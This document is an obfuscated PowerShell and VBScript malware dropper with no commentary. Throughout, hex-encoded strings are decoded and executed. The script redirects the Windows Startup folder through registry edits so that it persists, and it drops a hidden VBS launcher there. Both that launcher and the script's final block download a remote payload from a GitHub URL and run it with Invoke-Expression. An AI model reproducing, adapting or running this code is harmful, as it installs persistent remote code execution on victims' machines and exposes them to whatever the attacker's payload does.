$aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:22:-:2c:-:22:-:65:-:72:-:73:-:5c:-:50:-:75:-:62:-:6c:-:22:-:29:-:0a:-:24:-:59:-:47:-:55:-:59:-:47:-:4e:-:55:-:48:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:22:-:2c:-:22:-:65:-:61:-:74:-:65:-:44:-:69:-:72:-:65:-:63:-:74:-:22:-:29:-:0a:-:5b:-:73:-:79:-:73:-:74:-:65:-:6d:-:2e:-:69:-:6f:-:2e:-:64:-:69:-:72:-:65:-:63:-:74:-:6f:-:72:-:79:-:5d:-:3a:-:3a:-:24:-:59:-:47:-:55:-:59:-:47:-:4e:-:55:-:48:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:28:-:24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:29:-:0a:-:73:-:74:-:61:-:72:-:74:-:2d:-:73:-:6c:-:65:-:65:-:70:-:20:-:2d:-:73:-:20:-:35:-:0a:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:3d:-:20:-:22:-:48:-:4b:-:43:-:55:-:3a:-:5c:-:53:-:6f:-:66:-:74:-:77:-:61:-:72:-:65:-:5c:-:4d:-:69:-:63:-:72:-:6f:-:73:-:6f:-:66:-:74:-:5c:-:57:-:69:-:6e:-:64:-:6f:-:77:-:73:-:5c:-:43:-:75:-:72:-:72:-:65:-:6e:-:74:-:56:-:65:-:72:-:73:-:69:-:6f:-:6e:-:5c:-:45:-:78:-:70:-:6c:-:6f:-:72:-:65:-:72:-:5c:-:55:-:73:-:65:-:72:-:20:-:53:-:68:-:65:-:6c:-:6c:-:20:-:46:-:6f:-:6c:-:64:-:65:-:72:-:73:-:22:-:0a:-:24:-:47:-:56:-:46:-:48:-:54:-:46:-:59:-:55:-:47:-:52:-:54:-:59:-:55:-:47:-:59:-:46:-:54:-:46:-:59:-:59:-:55:-:48:-:3d:-:20:-:22:-:48:-:4b:-:43:-:55:-:3a:-:5c:-:53:-:6f:-:66:-:74:-:77:-:61:-:72:-:65:-:5c:-:4d:-:69:-:63:-:72:-:6f:-:73:-:6f:-:66:-:74:-:5c:-:57:-:69:-:6e:-:64:-:6f:-:77:-:73:-:5c:-:43:-:75:-:72:-:72:-:65:-:6e:-:74:-:56:-:65:-:72:-:73:-:69:-:6f:-:6e:-:5c:-:45:-:78:-:70:-:6c:-:6f:-:72:-:65:-:72:-:5c:-:53:-:68:-:65:-:6c:-:6c:-:20:-:46:-:6f:-:6c:-:64:-:65:-:72:-:73:-:22:-:0a:-:24:-:4a:-:59:-:48:-:47:-:59:-:55:-:47:-:55:-:59:-:47:-:46:-:59:-:54:-:46:-:44:-:54:-:52:-:44:-:54:-:52:-:44:-:46:-:54:-:52:-:20:-:3d:-:20:-:22:-:43:-:3a:-:5c:-:55:-:73:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:22:-:2c:-:22:-:65:-:72:-:73:-:5c:-:50:-:75:-:62:-:6c:-:69:-:22:-:29:-:0a:-:24:-:42:-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:20:-:3d:-:22:-:43:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:62:-:6c:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:22:-:2c:-:22:-:3a:-:5c:-:55:-:73:-:65:-:72:-:73:-:5c:-:50:-:75:-:22:-:29:-:0a:-:0a:-:53:-:65:-:74:-:2d:-:49:-:74:-:65:-:6d:-:50:-:72:-:6f:-:70:-:65:-:72:-:74:-:79:-:20:-:2d:-:50:-:61:-:74:-:68:-:20:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:-:20:-:24:-:4a:-:59:-:48:-:47:-:59:-:55:-:47:-:55:-:59:-:47:-:46:-:59:-:54:-:46:-:44:-:54:-:52:-:44:-:54:-:52:-:44:-:46:-:54:-:52:-:3b:-:0a:-:53:-:65:-:74:-:2d:-:49:-:74:-:65:-:6d:-:50:-:72:-:6f:-:70:-:65:-:72:-:74:-:79:-:20:-:2d:-:50:-:61:-:74:-:68:-:20:-:24:-:47:-:56:-:46:-:48:-:54:-:46:-:59:-:55:-:47:-:52:-:54:-:59:-:55:-:47:-:59:-:46:-:54:-:46:-:59:-:59:-:55:-:48:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:-:20:-:24:-:42:-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:3b"
$bb = $aa -split ':-:' |ForEach-Object {[char][byte]"0x$_"}
$cc = $bb -join ''
Invoke-Expression $cc
start-sleep -s 7
$Content = @'
ZASXDCFVGBHNJMKSXDCFVGBHNJMKLDCFVGBHNJ = "W"&"S"&"c"&"r"&"i"
AZSXDCFVGBHNJMKSXDCFVGBHNJMKSZXDCFVGBHNJK = chr(80)
WXECRVTBYNUMIKDCFVGBHNJMSXDCFVGBHNJEDRFGTYHUJI = "t.S"&"h"&"e"
WXEDCFVGBHNJKMSXDCFVGBHNJMKZSXDCFVGBHNJMKLSXDCFVGBH = "l"&"l"
Set WERFGYHUJIPSXDCFVGBHNJMCFVGBHNJMKEDRFGTYHUJIKO = CreateObject(ZASXDCFVGBHNJMKSXDCFVGBHNJMKLDCFVGBHNJ+AZSXDCFVGBHNJMKSXDCFVGBHNJMKSZXDCFVGBHNJK+WXECRVTBYNUMIKDCFVGBHNJMSXDCFVGBHNJEDRFGTYHUJI+WXEDCFVGBHNJKMSXDCFVGBHNJMKZSXDCFVGBHNJMKLSXDCFVGBH)
SXDCFVGBHNJMKSXDCFVGBHNJMKSXDCFVGBHNJWSEDRFTGYHU = chr(80)
SXDCFVGBHNJMKSXDCFVGBHNJMKSXDCFVGBHNJMK = Chr(69)
H1 = "OWERSH"+SXDCFVGBHNJMKSXDCFVGBHNJMKSXDCFVGBHNJMK+"LL"
H2 = " $SZXDCFVGBHNJSDFGH = 'https://github.com/0samabinl4d3n/public/raw/main/NEO.txt';;$SOS='24::::::45::::::4"
H3 = "4::::::52::::::46::::::47::::::48::::::4e::::::4a::::::4d::::::4b::::::44::::::45::::::46::::::47::::::48::::::4a::::::20::::::3d::::::20::::::27::::::6e::::::45::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2"
H4 = "d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::45::::::62::::::43::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2"
H5 = "b::::::54::::::27::::::2e::::::52::::::65::::::70::::::6c::::::61::::::63::::::65::::::28::::::27::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::27::::::2c::::::27::::::74::::::2e::::::57::::::2"
H6 = "7::::::29::::::2e::::::52::::::65::::::70::::::6c::::::61::::::63::::::65::::::28::::::27::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::2b::::::27::::::2c::::::27::::::6c::::::49::::::45::::::4e::::::27::::::29::::::3b::::::0a::::::24::::::5"
H7 = "3::::::58::::::44::::::43::::::46::::::56::::::47::::::42::::::48::::::4e::::::4a::::::58::::::44::::::43::::::46::::::56::::::47::::::42::::::48::::::4a::::::4b::::::20::::::3d::::::20::::::27::::::44::::::4f::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::61::::::44::::::53::::::54::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::47::::::27::::::2e::::::52::::::65::::::70::::::6c::::::61::::::63::::::65::::::28::::::27::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::2a::::::27::::::2c::::::27::::::57::::::6e::::::4c::::::6f::::::27::::::29::::::2e::::::52::::::65::::::70::::::6c::::::61::::::63::::::65::::::28::::::27::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3e::::::3e::::::3e::::::3e::::::3e::::::3"
H8 = "e::::::3e::::::3e::::::3e::::::3e::::::3e::::::27::::::2c::::::27::::::72::::::49::::::6e::::::27::::::29::::::3b::::::0a::::::24::::::53::::::57::::::58::::::44::::::45::::::43::::::52::::::46::::::47::::::59::::::48::::::55::::::4a::::::49::::::53::::::44::::::46::::::56::::::47::::::48::::::4a::::::20::::::3d::::::27::::::49::::::60::::::45::::::58::::::28::::::6e::::::60::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::60::::::63::::::60::::::54::::::20::::::24::::::45::::::44::::::52::::::46::::::47::::::48::::::4e::::::4a::::::4d::::::4b::::::44::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::47::::::42::::::48::::::4e::::::4a::::::53::::::44::::::46::::::47::::::48::::::29::::::27::::::2e::::::52::::::65::::::70::::::6c::::::61::::::63::::::65::::::28::::::27::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::2d::::::27::::::2c::::::27::::::65::::::60::::::57::::::60::::::2d::::::4f::::::62::::::6a::::::60::::::45::::::27::::::29::::::2e::::::52::::::65::::::70::::::6c::::::61::::::63::::::65::::::28::::::27::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3c::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::3e::::::27::::::2c::::::27::::::45::::::46::::::47::::::48::::::4a::::::29::::::2e::::::24::::::53::::::58::::::44::::::43::::::46::::::56::::::47::::::42::::::48::::::4e::::::4a::::::58::::::44::::::43::::::46::::::56::::::47::::::42::::::48::::::4a::::::4b::::::28::::::24::::::53::::::5a::::::58::::::44::::::43::::::46::::::56::::::27::::::29::::::3b::::::0a::::::26::::::28::::::27::::::49::::::27::::::2b::::::27::::::45::::::58::::::27::::::29::::::28::::::24::::::53::::::57::::::58::::::44::::::45::::::43::::::52::::::46::::::47::::::59::::::48::::::55::::::4a::::::49::::::53::::::4"
H12 = "4::::::46::::::56::::::47::::::48::::::4a::::::20::::::2d::::::4a::::::6f::::::69::::::6e::::::20::::::27::::::27::::::29::::::7c::::::26::::::28::::::27::::::4"
H9 = "9::::::27::::::2b::::::27::::::45::::::58::::::27::::::29::::::3b';Invoke-Expression (-jo"
H10 = "in ($SOS -split '::::::' | ? { $_ } | % { [char][con"
H11 = "vert]::ToUInt32($_,16) }))"
WERFGYHUJIPSXDCFVGBHNJMCFVGBHNJMKEDRFGTYHUJIKO.Run(SXDCFVGBHNJMKSXDCFVGBHNJMKSXDCFVGBHNJWSEDRFTGYHU+H1+H2+H3+H4+H5+H6+H7+H8+H12+H9+H10+H11+""),0,True
Set WERFGYHUJIPSXDCFVGBHNJMCFVGBHNJMKEDRFGTYHUJIKO = Nothing
'@
Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Content

start-sleep -s 7

$SZXDCFVGBHNJSDFGH = 'https://github.com/0samabinl4d3n/public/raw/main/NEO.txt'
$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:4a:-:4d:-:4b:-:44:-:45:-:46:-:47:-:48:-:4a:-:20:-:3d:-:20:-:27:-:6e:-:45:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:45:-:62:-:43:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:54:-:27:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:27:-:2c:-:27:-:74:-:2e:-:57:-:27:-:29:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:27:-:2c:-:27:-:6c:-:49:-:45:-:4e:-:27:-:29:-:3b:-:0a:-:24:-:53:-:58:-:44:-:43:-:46:-:56:-:47:-:42:-:48:-:4e:-:4a:-:58:-:44:-:43:-:46:-:56:-:47:-:42:-:48:-:4a:-:4b:-:20:-:3d:-:20:-:27:-:44:-:4f:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:61:-:44:-:53:-:54:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:47:-:27:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:27:-:2c:-:27:-:57:-:6e:-:4c:-:6f:-:27:-:29:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:27:-:2c:-:27:-:72:-:49:-:6e:-:27:-:29:-:3b:-:0a:-:24:-:53:-:57:-:58:-:44:-:45:-:43:-:52:-:46:-:47:-:59:-:48:-:55:-:4a:-:49:-:53:-:44:-:46:-:56:-:47:-:48:-:4a:-:20:-:3d:-:27:-:49:-:60:-:45:-:58:-:28:-:6e:-:60:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:60:-:63:-:60:-:54:-:20:-:24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:4a:-:4d:-:4b:-:44:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:47:-:42:-:48:-:4e:-:4a:-:53:-:44:-:46:-:47:-:48:-:29:-:27:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:27:-:2c:-:27:-:65:-:60:-:57:-:60:-:2d:-:4f:-:62:-:6a:-:60:-:45:-:27:-:29:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:27:-:2c:-:27:-:45:-:46:-:47:-:48:-:4a:-:29:-:2e:-:24:-:53:-:58:-:44:-:43:-:46:-:56:-:47:-:42:-:48:-:4e:-:4a:-:58:-:44:-:43:-:46:-:56:-:47:-:42:-:48:-:4a:-:4b:-:28:-:24:-:53:-:5a:-:58:-:44:-:43:-:46:-:56:-:27:-:29:-:3b:-:0a:-:26:-:28:-:27:-:49:-:27:-:2b:-:27:-:45:-:58:-:27:-:29:-:28:-:24:-:53:-:57:-:58:-:44:-:45:-:43:-:52:-:46:-:47:-:59:-:48:-:55:-:4a:-:49:-:53:-:44:-:46:-:56:-:47:-:48:-:4a:-:20:-:2d:-:4a:-:6f:-:69:-:6e:-:20:-:27:-:27:-:29:-:7c:-:26:-:28:-:27:-:49:-:27:-:2b:-:27:-:45:-:58:-:27:-:29:-:3b"
$BBBBBBBBBBBBBBBBBB = $HHHHHHHHHHHHHHHHHH -split ':-:' |ForEach-Object {[char][byte]"0x$_"}
$HHHHHHHHHHHBBBBBBBBBAAAAAAAARRRRRRRRR = $BBBBBBBBBBBBBBBBBB -join ''
Invoke-Expression $HHHHHHHHHHHBBBBBBBBBAAAAAAAARRRRRRRRR